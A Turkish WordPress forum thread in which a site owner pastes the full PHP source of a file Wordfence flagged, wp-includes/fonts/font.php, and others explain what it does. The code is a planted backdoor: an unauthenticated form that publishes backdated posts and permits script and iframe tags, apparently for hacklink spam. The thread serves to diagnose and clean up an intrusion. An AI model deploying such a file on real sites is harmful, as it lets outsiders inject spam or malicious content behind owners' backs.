• 14-02-2021, 19:46:25
    #1
    Merhaba arkadaşlar. Sitemde Wordfence eklentisi mevcut ve oradaki bildirim üzerine tarama sonuçlarına baktığımda wp-includes/fonts/font.php dosyasının bilinmeyen dosya olduğunu ve yüksek derecede riskli olduğunu belirtiyordu, bilgisayara indirdikten sonra sildim. Sayfa içindeki kodları baştan sona aşağıya bırakıyorum. Bilenler bakabilir mi, bu kodlar virüs mü, siteye hacklink eklemek için mi yazılmıştır? Dosya içerisinde wphaberekle gibi şeyler yazıyordu, Wordpress dosyasında bu olmaz heralde. Eğer hacklinkse, nerelere yerleştirdiğini anlamanın bir yolu var mı?

    <?php
    include("../../wp-load.php");
    ?>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    
    <div id="" style="margin-bottom:10px;border:1px dotted gray;padding:5px;">
    <form  name="form1"  id="form1" method="post">
        <table align="center">
    
    
    
            <tr><td>Baslik:</td><td><input name="baslik" id="baslik" value="" style="width:300px;"/></td></tr>  
        
    
    
            <tr>
    
    
                <td width= "100">
    
                    Yazi:</td><td><textarea name="icerik" rows="15" cols="50"></textarea></td></tr>
    
            <tr><td>Kategori</td><td>
    
                  <?php  wp_dropdown_categories("name=kat"); ?>
                </td></tr>
    
            <tr><td>
    
                  
    
                </td></tr>
    
        </table></div>
    <input type="submit" name="ekle" value="Ekle" />
    </form>
    <?
    
    
    
        if (isset($_POST['ekle'])) {
    
    
    
            $baslik   = $_POST['baslik'];
            $kategori = $_POST['kat'];
            $icerik  = $_POST['icerik'];
    
            wphaberekle($baslik,$resim,$icerik,$kategori) ;
    }
    
    
            function wphaberekle($baslik=null,$resim=null,$icerik=null,$link=null,$etiket=null,$kategori=null) {
            //print_r($kategori);
    //exit();
            global $wpdb;
            global $allowedposttags;
            $allowedposttags['div'] = array('align' => array (), 'class' => array (), 'id' => array (), 'dir' => array (), 'lang' => array(), 'style' => array (), 'xml:lang' => array() );
            $allowedposttags['script'] = array('src' => array () );
            $allowedposttags['iframe'] = array('src' => array () , 'width' => array (), 'height' => array (),'frameborder' => array () );
            $allowedposttags['object'] = array('src' => array (), 'width' => array (), 'height' => array (), 'id' => array (), 'align' => array (), 'classid' => array (), 'type' => array (),'data' => array () );
            $allowedposttags['embed'] = array('src' => array () );
            $allowedposttags['param'] = array('name' => array (),'value' => array () );
    
    
            $eski = date("Y") - 1;;
            $yil = date("m-d H:i:s");
            $ilerit =  $eski.'-'.$yil;
    
            $kontrol = get_page_by_title($baslik,OBJECT,"post");
            if ($kontrol) {
                $kontrol = "1";
            } else {$kontrol = "0";     }
    
            if ($icerik==""){
                $result[0] = FALSE;
                echo '<strong>bos icerik eklenemedi</strong> ' . $baslik.'<br>';
                return $result;
    }
    
    
            if ($kontrol=="1"){
                $result[0] = FALSE;
                echo '<strong>Zaten Eklenmis:</strong> ' . $baslik.'<br>';
                return $result;
    }
    
    
            $tags = explode(',',$etiket);
    
            $post = array();
            $post['post_title']     = $baslik;
            $post['post_content']   = $icerik;
            $post['post_status']    = 'publish';
            $post['post_type']        = 'post';        
            $post['post_date']      =  $ilerit;  
            $post['post_date_gmt']  =  $ilerit;  
            $post['post_category']  = array($kategori) ;
    
            $post = array_merge((array)$post, (array)$post2);
            //printr($post);
            $post_id = wp_insert_post($post);        
            $guid = get_permalink($post_id);
    
            wp_set_post_tags( $post_id, $tags, true );
    
    
    
    
            $result[0] = TRUE;
            echo '<strong>Eklendi:</strong> ' . $baslik.' - icerige gitmek icin <a href="'.$guid.'" target="_blank">tiklayiniz</a><br>';
    
            return $result;
    }
    
    
    ?>
  • 14-02-2021, 19:50:51
    #2
    Üyeliği durduruldu
    Yazı eklemek için yapılmış. Bu dosyayı çalıştırarak siteye içerik ekleyebilir.
  • 14-02-2021, 19:52:32
    #3
    AyhanAltuntas adlı üyeden alıntı: mesajı görüntüle
    Yazı eklemek için yapılmış. Bu dosyayı çalıştırarak siteye içerik ekleyebilir.
    Görür görmez sildim hocam. Peki yazı ekleyip eklemediğini bilmenin bir yolu var mı? Ve sadece yazı eklemek için mi yoksa düzenleyerek hacklinck eklemek için de çalışır mı sizce?
  • 14-02-2021, 19:58:54
    #4
    muhtemelen hacklink eklemek için yapılmış, o dosyanın atıldığı tarihte ve sonrasındaki makaleleri kontrol edin sizin yazmadığınız içerikler vardır muhtemelen
  • 14-02-2021, 20:00:32
    #5
    Üyeliği durduruldu
    orve adlı üyeden alıntı: mesajı görüntüle
    Görür görmez sildim hocam. Peki yazı ekleyip eklemediğini bilmenin bir yolu var mı? Ve sadece yazı eklemek için mi yoksa düzenleyerek hacklinck eklemek için de çalışır mı sizce?
    http://siteismi.com/wp-admin/edit.ph...ate&order=desc eklenen yazıları buradan bakabilirsin. Bilgin dışında eklenmiş içerik varsa içine istediği linkide koyabilir kontrol etmende fayda var.
  • 14-02-2021, 21:08:48
    #6
    AyhanAltuntas adlı üyeden alıntı: mesajı görüntüle
    http://siteismi.com/wp-admin/edit.ph...ate&order=desc eklenen yazıları buradan bakabilirsin. Bilgin dışında eklenmiş içerik varsa içine istediği linkide koyabilir kontrol etmende fayda var.
    Hocam ilgiliniz için çok teşekkür ediyorum tabii ki, eklenen yazılar derken onu kastetmemiştim. Bunu hazırlayıp Wordfence ve iThemes yüklü ve kurulu siteye koyanlar, eski bir tarihle de koyabilirler bence

    phpxtr adlı üyeden alıntı: mesajı görüntüle
    muhtemelen hacklink eklemek için yapılmış, o dosyanın atıldığı tarihte ve sonrasındaki makaleleri kontrol edin sizin yazmadığınız içerikler vardır muhtemelen
    Çok teşekkür ediyorum hocam. Peki eklenme tarihinden önceki içeriklere müdahale etmiş olma ihtimali var mıdır?
  • 14-02-2021, 21:19:23
    #7
    orve adlı üyeden alıntı: mesajı görüntüle
    Hocam ilgiliniz için çok teşekkür ediyorum tabii ki, eklenen yazılar derken onu kastetmemiştim. Bunu hazırlayıp Wordfence ve iThemes yüklü ve kurulu siteye koyanlar, eski bir tarihle de koyabilirler bence



    Çok teşekkür ediyorum hocam. Peki eklenme tarihinden önceki içeriklere müdahale etmiş olma ihtimali var mıdır?

    sanmıyorum hocam cunku kod sadece yeni içerik ekliyor gibi duruyor
  • 15-02-2021, 16:29:39
    #8
    phpxtr adlı üyeden alıntı: mesajı görüntüle
    sanmıyorum hocam cunku kod sadece yeni içerik ekliyor gibi duruyor
    Çok teşekkür ediyorum hocam, eksik olmayın